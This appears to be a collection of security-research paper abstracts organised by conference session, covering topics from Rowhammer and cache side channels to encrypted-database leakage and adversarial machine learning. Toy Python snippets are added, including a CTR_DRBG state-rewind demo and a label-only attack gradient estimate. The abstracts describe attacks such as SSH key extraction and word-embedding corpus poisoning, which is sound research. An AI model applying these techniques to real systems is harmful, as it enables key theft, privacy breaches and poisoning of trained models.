Actors engaged in election disinformation are using online advertising platforms to spread political messages. In response to this threat, online advertising networks have started making political advertising on their platforms more transparent in order to enable third parties to detect malicious advertisers. We present a set of methodologies and perform a security analysis of Facebook’s U.S. Ad Library, which is their political advertising transparency product. Unfortunately, we find that there are several weaknesses that enable a malicious advertiser to avoid accurate disclosure of their political ads. We also propose a clustering-based method to detect advertisers engaged in undeclared coordinated activity. Our clustering method identified 16 clusters of likely inauthentic communities that spent a total of over four million dollars on political advertising. This supports the idea that transparency could be a promising tool for combating disinformation. Finally, based on our findings, we make recommendations for improving the security of advertising transparency on Facebook and other platforms.

Can Voters Detect Malicious Manipulation of Ballot Marking Devices?

Ballot marking devices (BMDs) allow voters to select candidates on a computer kiosk, which prints a paper ballot that the voter can review before inserting it into a scanner to be tabulated. Unlike paperless voting machines, BMDs provide voters an opportunity to verify an auditable physical record of their choices, and a growing number of U.S. jurisdictions are adopting them for all voters. However, the security of BMDs depends on how reliably voters notice and correct any adversarially induced errors on their printed ballots. In order to measure voters’ error detection abilities, we conducted a large study (N = 241) in a realistic polling place setting using real voting machines that we modified to introduce an error into each printout. Without intervention, only 40% of participants reviewed their printed ballots at all, and only 6.6% told a poll worker something was wrong. We also find that carefully designed interventions can improve verification performance. Verbally instructing voters to review the printouts and providing a written slate of candidates for whom to vote both significantly increased review and reporting rates—although the improvements may not be large enough to provide strong security in close elections, especially when BMDs are used by all voters. Based on these findings, we make several evidence-based recommendations to help better defend BMD-based elections.

Session #4: Multiparty Computation

Efficient and Secure Multiparty Computation from Fixed-Key Block Ciphers

Many implementations of secure computation use fixed-key AES (modeled as a random permutation); this results in substantial performance benefits due to existing hardware support for AES and the ability to avoid recomputing the AES key schedule. Surveying these implementations, however, we find that most utilize AES in a heuristic fashion; in the best case this leaves a gap in the security proof, but in many cases we show it allows for explicit attacks. Motivated by this unsatisfactory state of affairs, we initiate a comprehensive study of how to use fixed-key block ciphers for secure computation—in particular for OT extension and circuit garbling—efficiently and securely. Specifically:
• We consider several notions of pseudorandomness for hash functions (e.g., correlation robustness), and show provably secure schemes for OT extension, garbling, and other applications based on hash functions satisfying these notions.
• We provide provably secure constructions, in the (non-programmable) random-permutation model, of hash functions satisfying the different notions of pseudorandomness we consider.
Taken together, our results provide end-to-end security proofs for implementations of secure-computation protocols based on fixed-key block ciphers (modeled as random permutations). Perhaps surprisingly, at the same time our work also results in noticeable performance improvements over the state-of-the-art.
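
As background for why fixed-key AES appears everywhere: the key schedule runs once, after which the cipher behaves as a single public permutation π, and garbling-style hashes are built from it with constructions like Matyas-Meyer-Oseas, H(x) = π(x) ⊕ x. The sketch below shows only that general pattern; which such constructions actually satisfy the required pseudorandomness notions is precisely the paper's subject, so do not read this as their recommended scheme.

```python
# pip install cryptography
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

FIXED_KEY = bytes(16)  # public and fixed: the key schedule is paid only once
_pi = Cipher(algorithms.AES(FIXED_KEY), modes.ECB()).encryptor()

def mmo_hash(x: bytes) -> bytes:
    """H(x) = pi(x) XOR x for a 16-byte block, with pi = AES under a
    fixed public key (Matyas-Meyer-Oseas over a fixed permutation)."""
    assert len(x) == 16
    return bytes(a ^ b for a, b in zip(_pi.update(x), x))
```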

Path Oblivious Heap: Optimal and Practical Oblivious Priority Queue

We propose Path Oblivious Heap, an extremely simple, practical, and optimal oblivious priority queue. Our construction also implies a practical and optimal oblivious sorting algorithm which we call Path Oblivious Sort. Not only are our algorithms asymptotically optimal, we show that their practical performance is only a small constant factor worse than insecure baselines. More specifically, assuming roughly logarithmic client private storage, Path Oblivious Heap consumes 2× to 7× more bandwidth than the ordinary insecure binary heap; and Path Oblivious Sort consumes 4.5× to 6× more bandwidth than the insecure Merge Sort. We show that these performance results improve existing works by 1-2 orders of magnitude. Finally, we evaluate our algorithm for a multi-party computation scenario and show a 7× to 8× reduction in the number of symmetric encryptions relative to the state of the art.

Transparent Polynomial Delegation and Its Applications to Zero Knowledge Proof

We present a new succinct zero knowledge argument scheme for layered arithmetic circuits without trusted setup. The prover time is O(C + n log n) and the proof size is O(D log C + log² n) for a D-depth circuit with n inputs and C gates. The verification time is also succinct, O(D log C + log² n), if the circuit is structured. Our scheme only uses lightweight cryptographic primitives such as collision-resistant hash functions and is plausibly post-quantum secure. We implement a zero knowledge argument system, Virgo, based on our new scheme and compare its performance to existing schemes. Experiments show that it only takes 53 seconds to generate a proof for a circuit computing a Merkle tree with 256 leaves, at least an order of magnitude faster than all other succinct zero knowledge argument schemes. The verification time is 50ms, and the proof size is 253KB, both competitive to existing systems. Underlying Virgo is a new transparent zero knowledge verifiable polynomial delegation scheme with logarithmic proof size and verification time. The scheme is in the interactive oracle proof model and may be of independent interest.

Towards Scalable Threshold Cryptosystems

The resurging interest in Byzantine fault tolerant systems will demand more scalable threshold cryptosystems. Unfortunately, current systems scale poorly, requiring time quadratic in the number of participants. In this paper, we present techniques that help scale threshold signature schemes (TSS), verifiable secret sharing (VSS) and distributed key generation (DKG) protocols to hundreds of thousands of participants and beyond. First, we use efficient algorithms for evaluating polynomials at multiple points to speed up computing Lagrange coefficients when aggregating threshold signatures. As a result, we can aggregate a 130,000 out of 260,000 BLS threshold signature in just 6 seconds (down from 30 minutes). Second, we show how “authenticating” such multipoint evaluations can speed up proving polynomial evaluations, a key step in communication-efficient VSS and DKG protocols. As a result, we reduce the asymptotic (and concrete) computational complexity of VSS and DKG protocols from quadratic time to quasilinear time, at a small increase in communication complexity. For example, using our DKG protocol, we can securely generate a key for the BLS scheme above in 2.3 hours (down from 8 days). Our techniques improve performance for thresholds as small as 255 and generalize to any Lagrange-based threshold scheme, not just threshold signatures. Our work has certain limitations: we require a trusted setup, we focus on synchronous VSS and DKG protocols and we do not address the worst-case complaint overhead in DKGs. Nonetheless, we hope it will spark new interest in designing large-scale distributed systems.
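
To see what the multipoint-evaluation trick is speeding up: aggregating a t-out-of-n threshold signature requires the Lagrange coefficients ℓ_i(0) for the signer set, and computing them naively costs O(t²) field operations, the quadratic bottleneck the paper removes. A naive reference version (prime-field and indexing conventions are mine):

```python
def lagrange_at_zero(indices, p):
    """Naive O(t^2) Lagrange coefficients l_i(0) mod prime p, where
    l_i(0) = prod_{j != i} (0 - j) / (i - j). The aggregated secret or
    signature is then sum_i l_i(0) * share_i."""
    coeffs = {}
    for i in indices:
        num = den = 1
        for j in indices:
            if j != i:
                num = num * (-j) % p
                den = den * (i - j) % p
        coeffs[i] = num * pow(den, -1, p) % p  # modular inverse (Py >= 3.8)
    return coeffs
```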

Session #5: Rowhammer

RAMBleed: Reading Bits in Memory Without Accessing Them

The Rowhammer bug is a reliability issue in DRAM cells that can enable an unprivileged adversary to flip the values of bits in neighboring rows on the memory module. Previous work has exploited this for various types of fault attacks across security boundaries, where the attacker flips inaccessible bits, often resulting in privilege escalation. It is widely assumed, however, that bit flips within the adversary’s own private memory have no security implications, as the attacker can already modify its private memory via regular write operations. We demonstrate that this assumption is incorrect, by employing Rowhammer as a read side channel. More specifically, we show how an unprivileged attacker can exploit the data dependence between Rowhammer-induced bit flips and the bits in nearby rows to deduce these bits, including values belonging to other processes and the kernel. Thus, the primary contribution of this work is to show that Rowhammer is a threat to not only integrity, but to confidentiality as well. Furthermore, in contrast to Rowhammer write side channels, which require persistent bit flips, our read channel succeeds even when ECC memory detects and corrects every bit flip. Thus, we demonstrate the first security implication of successfully-corrected bit flips, which were previously considered benign. To demonstrate the implications of this read side channel, we present an end-to-end attack on OpenSSH 7.9 that extracts an RSA-2048 key from the root level SSH daemon. To accomplish this, we develop novel techniques for massaging memory from user space into an exploitable state, and use the DRAM rowbuffer timing side channel to locate physically contiguous memory necessary for double-sided Rowhammering. Unlike previous Rowhammer attacks, our attack does not require the use of huge pages, and it works on Ubuntu Linux under its default configuration settings.

Are We Susceptible to Rowhammer? An End-to-End Methodology for Cloud Providers

Cloud providers are concerned that Rowhammer poses a potentially critical threat to their servers, yet today they lack a systematic way to test whether the DRAM used in their servers is vulnerable to Rowhammer attacks. This paper presents an end-to-end methodology to determine if cloud servers are susceptible to these attacks. With our methodology, a cloud provider can construct worst-case testing conditions for DRAM. We apply our methodology to three classes of servers from a major cloud provider. Our findings show that none of the CPU instruction sequences used in prior work to mount Rowhammer attacks create worst-case DRAM testing conditions. To address this limitation, we develop an instruction sequence that leverages microarchitectural side-effects to “hammer” DRAM at a near-optimal rate on modern Intel Skylake and Cascade Lake platforms. We also design a DDR4 fault injector that can reverse engineer row adjacency for any DDR4 DIMM. When applied to our cloud provider’s DIMMs, we find that DRAM rows do not always follow a linear map.

Leveraging EM Side-Channel Information to Detect Rowhammer Attacks

The rowhammer bug belongs to software-induced hardware faults, and has been exploited to form a wide range of powerful rowhammer attacks. Yet, how to effectively detect such attacks remains a challenging problem. In this paper, we propose a novel approach named RADAR (Rowhammer Attack Detection via A Radio) that leverages certain electromagnetic (EM) signals to detect rowhammer attacks. In particular, we have found that there are recognizable hammering-correlated sideband patterns in the spectrum of the DRAM clock signal. As such patterns are inevitable physical side effects of hammering the DRAM, they can “expose” any potential rowhammer attacks including the extremely elusive ones hidden inside encrypted and isolated environments like Intel SGX enclaves. However, the patterns of interest may become unapparent due to the common use of spread-spectrum clocking (SSC) in computer systems. We propose a de-spreading method that can reassemble the hammering-correlated sideband patterns scattered by SSC. Using a common classification technique, we can achieve both effective and robust detection-based defense against rowhammer attacks, as evaluated on a RADAR prototype under various scenarios. In addition, our RADAR does not impose any performance overhead on the protected system. There has been little prior work that uses physical side-channel information to perform rowhammer defenses, and to the best of our knowledge, this is the first investigation on leveraging EM side-channel information for this purpose.

TRRespass: Exploiting the Many Sides of Target Row Refresh

After a plethora of high-profile RowHammer attacks, CPU and DRAM vendors scrambled to deliver what was meant to be the definitive hardware solution against the RowHammer problem: Target Row Refresh (TRR). A common belief among practitioners is that, for the latest generation of DDR4 systems that are protected by TRR, RowHammer is no longer an issue in practice. However, in reality, very little is known about TRR. How does TRR exactly prevent RowHammer? Which parts of a system are responsible for operating the TRR mechanism? Does TRR completely solve the RowHammer problem or does it have weaknesses? In this paper, we demystify the inner workings of TRR and debunk its security guarantees. We show that what is advertised as a single mitigation mechanism is actually a series of different solutions coalesced under the umbrella term Target Row Refresh. We inspect and disclose, via a deep analysis, different existing TRR solutions and demonstrate that modern implementations operate entirely inside DRAM chips. Despite the difficulties of analyzing in-DRAM mitigations, we describe novel techniques for gaining insights into the operation of these mitigation mechanisms. These insights allow us to build TRRespass, a scalable black-box RowHammer fuzzer that we evaluate on 42 recent DDR4 modules. TRRespass shows that even the latest generation DDR4 chips with in-DRAM TRR, immune to all known RowHammer attacks, are often still vulnerable to new TRR-aware variants of RowHammer that we develop. In particular, TRRespass finds that, on present-day DDR4 modules, RowHammer is still possible when many aggressor rows are used (as many as 19 in some cases), with a method we generally refer to as Many-sided RowHammer. Overall, our analysis shows that 13 out of the 42 modules from all three major DRAM vendors (i.e., Samsung, Micron, and Hynix) are vulnerable to our TRR-aware RowHammer access patterns, and thus one can still mount existing state-of-the-art system-level RowHammer attacks. In a…

Session #6: Formal Verification

The Last Mile: High-Assurance and High-Speed Cryptographic Implementations

We develop a new approach for building cryptographic implementations. Our approach goes the last mile and delivers assembly code that is provably functionally correct, protected against side-channels, and as efficient as hand-written assembly. We illustrate our approach using ChaCha20-Poly1305, one of the two ciphersuites recommended in TLS 1.3, and deliver formally verified vectorized implementations which outperform the fastest non-verified code. We realize our approach by combining the Jasmin framework, which offers in a single language features of high-level and low-level programming, and the EasyCrypt proof assistant, which offers a versatile verification infrastructure that supports proofs of functional correctness and equivalence checking. Neither of these tools had been used for functional correctness before. Taken together, these infrastructures empower programmers to develop efficient and verified implementations by “game hopping”, starting from reference implementations that are proved functionally correct against a specification, and gradually introducing program optimizations that are proved correct by equivalence checking. We also make several contributions of independent interest, including a new and extensible verified compiler for Jasmin, with a richer memory model and support for vectorized instructions, and a new embedding of Jasmin in EasyCrypt.

EverCrypt: A Fast, Verified, Cross-Platform Cryptographic Provider

We present EverCrypt: a comprehensive collection of verified, high-performance cryptographic functionalities available via a carefully designed API. The API provably supports agility (choosing between multiple algorithms for the same functionality) and multiplexing (choosing between multiple implementations of the same algorithm). Through abstraction and zero-cost generic programming, we show how agility can simplify verification without sacrificing performance, and we demonstrate how C and assembly can be composed and verified against shared specifications. We substantiate the effectiveness of these techniques with new verified implementations (including hashes, Curve25519, and AES-GCM) whose performance matches or exceeds the best unverified implementations. We validate the API design with two high-performance verified case studies built atop EverCrypt, resulting in line-rate performance for a secure network protocol and a Merkle-tree library, used in a production blockchain, that supports 2.7 million insertions/sec. Altogether, EverCrypt consists of over 124K verified lines of specs, code, and proofs, and it produces over 29K lines of C and 14K lines of assembly code.

Rigorous Engineering for Hardware Security: Formal Modelling and Proof in the CHERI Design and Implementation Process

The root causes of many security vulnerabilities include a pernicious combination of two problems, often regarded as inescapable aspects of computing. First, the protection mechanisms provided by the mainstream processor architecture and C/C++ language abstractions, dating back to the 1970s and before, provide only coarse-grain virtual-memory-based protection. Second, mainstream system engineering relies almost exclusively on test-and-debug methods, with (at best) prose specifications. These methods have historically sufficed commercially for much of the computer industry, but they fail to prevent large numbers of exploitable bugs, and the security problems that this causes are becoming ever more acute. In this paper we show how more rigorous engineering methods can be applied to the development of a new security-enhanced processor architecture, with its accompanying hardware implementation and software stack. We use formal models of the complete instruction-set architecture (ISA) at the heart of the design and engineering process, both in lightweight ways that support and improve normal engineering practice - as documentation, in emulators used as a test oracle for hardware and for running software, and for test generation - and for formal verification. We formalise key intended security properties of the design, and establish that these hold with mechanised proof. This is for the same complete ISA models (complete enough to boot operating systems), without idealisation. We do this for CHERI, an architecture with hardware capabilities that supports fine-grained memory protection and scalable secure compartmentalisation, while offering a smooth adoption path for existing software. CHERI is a maturing research architecture, developed since 2010, with work now underway on an Arm industrial prototype to explore its possible adoption in mass-market commercial processors. The rigorous engineering work described here has been an integral part of its development to date, enabling more rapid and confident experimentation, and boosting confidence in the design.

Binsec/Rel: Efficient Relational Symbolic Execution for Constant-Time at Binary-Level

The constant-time programming discipline (CT) is an efficient countermeasure against timing side-channel attacks, requiring the control flow and the memory accesses to be independent from the secrets. Yet, writing CT code is challenging as it demands reasoning about pairs of execution traces (2-hypersafety property) and it is generally not preserved by the compiler, requiring binary-level analysis. Unfortunately, current verification tools for CT either reason at higher level (C or LLVM), or sacrifice bug-finding or bounded-verification, or do not scale. We tackle the problem of designing an efficient binary-level verification tool for CT providing both bug-finding and bounded-verification. The technique builds on relational symbolic execution enhanced with new optimizations dedicated to information flow and binary-level analysis, yielding a dramatic improvement over prior work based on symbolic execution. We implement a prototype, BINSEC/REL, and perform extensive experiments on a set of 338 cryptographic implementations, demonstrating the benefits of our approach in both bug-finding and bounded-verification. Using BINSEC/REL, we also automate a previous manual study of CT preservation by compilers. Interestingly, we discovered that gcc -O0 and backend passes of clang introduce violations of CT in implementations that were previously deemed secure by a state-of-the-art CT verification tool operating at LLVM level, showing the importance of reasoning at binary level.
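
For readers unfamiliar with the discipline the tool verifies, the classic violating/compliant pair is sketched below (written in Python purely to show the control-flow property; real CT targets are C and assembly, and, as the paper shows, even CT-correct source can be broken by compiler passes). Python's standard library exposes the safe idiom as hmac.compare_digest.

```python
def leaky_equal(secret: bytes, guess: bytes) -> bool:
    """Early-exit comparison: running time depends on the position of
    the first mismatch, i.e. a secret-dependent branch, which is exactly
    what the CT discipline forbids."""
    if len(secret) != len(guess):
        return False
    for s, g in zip(secret, guess):
        if s != g:
            return False
    return True

def ct_equal(secret: bytes, guess: bytes) -> bool:
    """Branchless comparison: the same operations execute no matter
    where (or whether) the inputs differ."""
    if len(secret) != len(guess):
        return False
    acc = 0
    for s, g in zip(secret, guess):
        acc |= s ^ g
    return acc == 0
```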

Session #6: Attacks and Forensics

PMP: Cost-effective Forced Execution with Probabilistic Memory Pre-planning

Malware is a prominent security threat and exposing malware behavior is a critical challenge. Recent malware often has payload that is only released when certain conditions are satisfied. It is hence difficult to fully disclose the payload by simply executing the malware. In addition, malware samples may be equipped with cloaking techniques such as VM detectors that stop execution once detecting that the malware is being monitored. Forced execution is a highly effective method to penetrate malware self-protection and expose hidden behavior, by forcefully setting certain branch outcomes. However, an existing state-of-the-art forced execution technique X-Force is very heavyweight, requiring tracing individual instructions, reasoning about pointer alias relations on-the-fly, and repairing invalid pointers by on-demand memory allocation. We develop a light-weight and practical forced execution technique. Without losing analysis precision, it avoids tracking individual instructions and on-demand allocation. Under our scheme, a forced execution is very similar to a native one. It features a novel memory pre-planning phase that pre-allocates a large memory buffer, and then initializes the buffer, and variables in the subject binary, with carefully crafted values in a random fashion before the real execution. The pre-planning is designed in such a way that dereferencing an invalid pointer has a very large chance to fall into the pre-allocated region and hence does not cause any exception, and semantically unrelated invalid pointer dereferences highly likely access disjoint (pre-allocated) memory regions, avoiding state corruptions with probabilistic guarantees. Our experiments show that our technique is 84 times faster than X-Force, has 6.5X and 10% fewer false positives and negatives for program dependence detection, respectively, and can expose 98% more malicious behaviors in 400 recent malware samples.

Combating Dependence Explosion in Forensic Analysis Using Alternative Tag Propagation Semantics

We are witnessing a rapid escalation in targeted cyber-attacks called Advanced Persistent Threats (APTs). Carried out by skilled adversaries, these attacks take place over extended time periods, and remain undetected for months. A common approach for retracing the attacker’s steps is to start with one or more suspicious events from system logs, and perform a dependence analysis to uncover the rest of attacker’s actions. The accuracy of this analysis suffers from the dependence explosion problem, which causes a very large number of benign events to be flagged as part of the attack. In this paper, we propose two novel techniques, tag attenuation and tag decay, to mitigate dependence explosion. Our techniques take advantage of common behaviors of benign processes, while providing a conservative treatment of processes and data with suspicious provenance. Our system, called Morse, is able to construct a compact scenario graph that summarizes attacker activity by sifting through millions of system events in a matter of seconds. Our experimental evaluation, carried out using data from two government-agency sponsored red team exercises, demonstrates that our techniques are (a) effective in identifying stealthy attack campaigns, (b) reduce the false alarm rates by more than an order of magnitude, and (c) yield compact scenario graphs that capture the vast majority of the attack, while leaving out benign background activity.

TARDIS: Rolling Back The Clock On CMS-Targeting Cyber Attacks

Over 55% of the world’s websites run on Content Management Systems (CMS). Unfortunately, this huge user population has made CMS-based websites a high-profile target for hackers. Worse still, the vast majority of the website hosting industry has shifted to a “backup and restore” model of security, which relies on error-prone AV scanners to prompt users to roll back to a pre-infection nightly snapshot. This research had the opportunity to study these nightly backups for over 300,000 unique production websites. In doing so, we measured the attack landscape of CMS-based websites and assessed the effectiveness of the backup and restore protection scheme. To our surprise, we found that the evolution of tens of thousands of attacks exhibited clear long-lived multi-stage attack patterns. We now propose TARDIS, an automated provenance inference technique, which enables the investigation and remediation of CMS-targeting attacks based on only the nightly backups already being collected by website hosting companies. With the help of our industry collaborator, we applied TARDIS to the nightly backups of those 300K websites and found 20,591 attacks which lasted from 6 to 1,694 days, some of which had yet to be detected.

Tactical Provenance Analysis for Endpoint Detection and Response Systems

Endpoint Detection and Response (EDR) tools provide visibility into sophisticated intrusions by matching system events against known adversarial behaviors. However, current solutions suffer from three challenges: 1) EDR tools generate a high volume of false alarms, creating backlogs of investigation tasks for analysts; 2) determining the veracity of these threat alerts requires tedious manual labor due to the overwhelming amount of low-level system logs, creating a “needle-in-a-haystack” problem; and 3) due to the tremendous resource burden of log retention, in practice the system logs describing long-lived attack campaigns are often deleted before an investigation is ever initiated. This paper describes an effort to bring the benefits of data provenance to commercial EDR tools. We introduce the notion of Tactical Provenance Graphs (TPGs) that, rather than encoding low-level system event dependencies, reason about causal dependencies between EDR-generated threat alerts. TPGs provide compact visualization of multi-stage attacks to analysts, accelerating investigation. To address EDR’s false alarm problem, we introduce a threat scoring methodology that assesses risk based on the temporal ordering between individual threat alerts present in the TPG. In contrast to the retention of unwieldy system logs, we maintain a minimally-sufficient skeleton graph that can provide linkability between existing and future threat alerts. We evaluate our system, RapSheet, using the Symantec EDR tool in an enterprise environment. Results show that our approach can rank truly malicious TPGs higher than false alarm TPGs. Moreover, our skeleton graph reduces the long-term burden of log retention by up to 87%.

Throwing Darts in the Dark? Detecting Bots with Limited Data using Neural Data Augmentation

Machine learning has been widely applied to building security applications. However, many machine learning models require the continuous supply of representative labeled data for training, which limits the models’ usefulness in practice. In this paper, we use bot detection as an example to explore the use of data synthesis to address this problem. We collected the network traffic from 3 online services in three different months within a year (23 million network requests). We develop a stream-based feature encoding scheme to support machine learning models for detecting advanced bots. The key novelty is that our model detects bots with extremely limited labeled data. We propose a data synthesis method to synthesize unseen (or future) bot behavior distributions. The synthesis method is distribution-aware, using two different generators in a Generative Adversarial Network to synthesize data for the clustered regions and the outlier regions in the feature space. We evaluate this idea and show our method can train a model that outperforms existing methods with only 1% of the labeled data. We show that data synthesis also improves the model’s sustainability over time and speeds up the retraining. Finally, we compare data synthesis and adversarial retraining and show that they complement each other in improving the model’s generalizability.

Session #7: Cryptanalysis and Side Channels

JIT Leaks: Inducing Timing Side Channels through Just-In-Time Compilation

Side-channel vulnerabilities in software are caused by an observable imbalance in resource usage across different program paths. We show that just-in-time (JIT) compilation, which is crucial to the runtime performance of modern interpreted languages, can introduce timing side channels in cases where the input distribution to the program is non-uniform. Such timing channels can enable an attacker to infer potentially sensitive information about predicates on the program input. We define three attack models under which such side channels are harnessable and five vulnerability templates to detect susceptible code fragments and predicates. We also propose profiling algorithms to generate the representative statistical information necessary for the attacker to perform accurate inference. We systematically evaluate the strength of these JIT-based side channels on the java.lang.String, java.lang.Math, and java.math.BigInteger classes from the Java standard library, and on the JavaScript built-in objects String, Math, and Array. We carry out our evaluation using two widely adopted, open-source, JIT-enhanced runtime engines for the Java and JavaScript languages: the Oracle HotSpot Java Virtual Machine and the Google V8 JavaScript engine, respectively. Finally, we demonstrate a few examples of JIT-based side channels in the Apache Shiro security framework and the GraphHopper route planning server, and show that they are observable over the public Internet.

The State of the Uniform: Attacks on Encrypted Databases Beyond the Uniform Query Distribution

Recent foundational work on leakage-abuse attacks on encrypted databases has broadened our understanding of what an adversary can accomplish with a standard leakage profile. Nevertheless, all known value reconstruction attacks succeed under strong assumptions that may not hold in the real world. The most prevalent assumption is that queries are issued uniformly at random by the client. We present the first value reconstruction attacks that succeed without any knowledge about the query or data distribution. Our approach uses the search-pattern leakage, which exists in all known structured encryption schemes but has not been fully exploited so far. At the core of our method lies a support size estimator, a technique that utilizes the repetition of search tokens with the same response to estimate distances between encrypted values without any assumptions about the underlying distribution. We develop distribution-agnostic reconstruction attacks for both range queries and k-nearest-neighbor (k-NN) queries based on information extracted from the search-pattern leakage. Our new range attack follows a different algorithmic approach than state-of-the-art attacks, which are fine-tuned to succeed under uniformly distributed queries. Instead, we reconstruct plaintext values under a variety of skewed query distributions and even outperform the accuracy of previous approaches under the uniform query distribution. Our new k-NN attack succeeds with far fewer samples than previous attacks and scales to much larger values of k. We demonstrate the effectiveness of our attacks by experimentally testing them on a wide range of query distributions and database densities, both unknown to the adversary.
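
The search-pattern idea is that repeated tokens reveal how many distinct underlying values have been queried. The paper's own support-size estimator is not reproduced here; as a stand-in with the same flavor, the standard Chao1 estimator infers unseen support from singleton and doubleton counts, with no assumption on the query distribution:

```python
from collections import Counter

def chao1_support(tokens):
    """Chao1 estimate of the number of distinct values behind a stream of
    (repeating) search tokens: S_obs + f1^2 / (2 * f2), where f1 and f2
    count tokens observed exactly once and exactly twice."""
    counts = Counter(tokens)
    s_obs = len(counts)
    f1 = sum(1 for c in counts.values() if c == 1)
    f2 = sum(1 for c in counts.values() if c == 2)
    if f2 == 0:  # bias-corrected variant when no doubletons were seen
        return s_obs + f1 * (f1 - 1) / 2
    return s_obs + (f1 * f1) / (2 * f2)
```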

Pseudorandom Black Swans: Cache Attacks on CTR_DRBG

Modern cryptography requires the ability to securely generate pseudorandom numbers. However, despite decades of work on side-channel attacks, there is little discussion of their application to pseudorandom number generators (PRGs). In this work we set out to address this gap, empirically evaluating the side-channel resistance of common PRG implementations. We find that hard-learned lessons about side-channel leakage from encryption primitives have not been applied to PRGs, at all abstraction levels. At the design level, the NIST-recommended CTR_DRBG does not have forward security if an attacker is able to compromise the state (e.g., via a side-channel). At the primitive level, popular implementations of CTR_DRBG such as OpenSSL’s FIPS module and NetBSD’s kernel use leaky T-table AES as their underlying cipher, enabling cache side-channel attacks. Finally, we find that many implementations make parameter choices that enable an attacker to fully exploit side-channels and recover secret keys from TLS connections. We empirically demonstrate our attack in two scenarios. First, we carry out a cache attack that recovers the private state from vulnerable CTR_DRBG implementations when the TLS client connects to an attacker-controlled server. We then subsequently use the recovered state to compute the client’s long-term authentication keys, thereby allowing the attacker to impersonate the client. In the second scenario, we show that an attacker can exploit the high temporal resolution provided by Intel SGX to carry out a blind attack to recover CTR_DRBG’s state within three AES encryptions, without viewing output, and thus decrypt passively collected TLS connections from the victim.
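
To see why a state compromise is devastating, here is a deliberately simplified CTR_DRBG generate loop in Python (AES-128 via the `cryptography` package; personalization, reseeding, and the end-of-call update step are omitted, so this is a sketch of the issue, not a NIST-conformant implementation). Within one generate call the state (K, V) is never refreshed, so a single snapshot lets an attacker rewind the counter and recompute every block of that call:

```python
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def aes_block(key, block):
    enc = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
    return enc.update(block) + enc.finalize()

def inc128(v):
    return ((int.from_bytes(v, "big") + 1) % (1 << 128)).to_bytes(16, "big")

def generate(key, v, nblocks):
    """Simplified CTR_DRBG generate: output block i is AES_K(V + i).
    The per-call state update that would follow is omitted here."""
    out = []
    for _ in range(nblocks):
        v = inc128(v)
        out.append(aes_block(key, v))
    return b"".join(out), (key, v)

key, v = b"K" * 16, b"\x00" * 16
stream, snapshot = generate(key, v, 4)

# An attacker who captures (key, V) after block 4 (e.g., via a cache
# side channel) rewinds the counter and recomputes block 1 of the
# very same call:
k2, v2 = snapshot
v_first = (int.from_bytes(v2, "big") - 3).to_bytes(16, "big")
assert aes_block(k2, v_first) == stream[:16]
```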

Flaw Label: Exploiting IPv6 Flow Label

The IPv6 protocol was designed with security in mind. One of the changes that IPv6 has introduced over IPv4 is a new 20-bit flow label field in its protocol header. We show that remote servers can use the flow label field in order to assign a unique ID to each device when communicating with machines running Windows 10 (versions 1703 and higher), and Linux and Android (kernel versions 4.3 and higher). The servers are then able to associate the respective device IDs with subsequent transmissions sent from those machines. This identification is done by exploiting the flow label field generation logic and works across all browsers regardless of network changes. Furthermore, a variant of this attack also works passively, namely without actively triggering traffic from those machines. To design the attack we reverse-engineered and cryptanalyzed the Windows flow label generation code and inspected the Linux kernel flow label generation code. We provide a practical technique to partially extract the key used by each of these algorithms, and observe that this key can identify individual devices across networks, VPNs, browsers and privacy settings. We deployed a demo (for both Windows and Linux/Android) showing that key extraction and machine fingerprinting works in the wild, and tested it from networks around the world.

Session #7: Adversarial Machine Learning

HopSkipJumpAttack: A Query-Efficient Decision-Based Attack

The goal of a decision-based adversarial attack on a trained model is to generate adversarial examples based solely on observing output labels returned by the targeted model. We develop HopSkipJumpAttack, a family of algorithms based on a novel estimate of the gradient direction using binary information at the decision boundary. The proposed family includes both untargeted and targeted attacks optimized for ℓ₂ and ℓ∞ similarity metrics, respectively. Theoretical analysis is provided for the proposed algorithms and the gradient direction estimate. Experiments show HopSkipJumpAttack requires significantly fewer model queries than several state-of-the-art decision-based adversarial attacks. It also achieves competitive performance in attacking several widely-used defense mechanisms.
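
The core of the attack is a Monte Carlo estimate of the gradient direction built from hard labels sampled around a boundary point. A minimal numpy sketch, with a toy linear classifier standing in for the remote model (the binary search toward the boundary and the geometric step-size control are omitted):

```python
import numpy as np

rng = np.random.default_rng(0)
w = rng.normal(size=32)          # toy model: a linear decision boundary

def phi(x):
    """Hard-label oracle: the attacker only sees +1 / -1 decisions."""
    return 1.0 if w @ x > 0 else -1.0

def estimate_direction(x_boundary, delta=1e-2, n=2000):
    """Monte Carlo gradient-direction estimate from binary feedback
    at a boundary point (the core HopSkipJump idea, simplified)."""
    u = rng.normal(size=(n, x_boundary.size))
    u /= np.linalg.norm(u, axis=1, keepdims=True)   # unit perturbations
    labels = np.array([phi(x_boundary + delta * ub) for ub in u])
    v = (labels[:, None] * u).mean(axis=0)          # label-weighted average
    return v / np.linalg.norm(v)

x0 = rng.normal(size=32)
x0 -= (w @ x0) / (w @ w) * w     # project x0 onto the decision boundary
d = estimate_direction(x0)
print("cosine to true normal:", d @ (w / np.linalg.norm(w)))  # close to 1
```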

Humpty Dumpty: Controlling Word Meanings via Corpus Poisoning

Word embeddings, i.e., low-dimensional vector representations such as GloVe and SGNS, encode word “meaning” in the sense that distances between words’ vectors correspond to their semantic proximity. This enables transfer learning of semantics for a variety of natural language processing tasks. Word embeddings are typically trained on large public corpora such as Wikipedia or Twitter. We demonstrate that an attacker who can modify the corpus on which the embedding is trained can control the “meaning” of new and existing words by changing their locations in the embedding space. We develop an explicit expression over corpus features that serves as a proxy for distance between words and establish a causative relationship between its values and embedding distances. We then show how to use this relationship for two adversarial objectives: (1) make a word a top-ranked neighbor of another word, and (2) move a word from one semantic cluster to another. An attack on the embedding can affect diverse downstream tasks, demonstrating for the first time the power of data poisoning in transfer learning scenarios. We use this attack to manipulate query expansion in information retrieval systems such as resume search, make certain names more or less visible to named entity recognition models, and cause new words to be translated to a particular target word regardless of the language. Finally, we show how the attacker can generate linguistically likely corpus modifications, thus fooling defenses that attempt to filter implausible sentences from the corpus using a language model.

Privacy Risks of General-Purpose Language Models

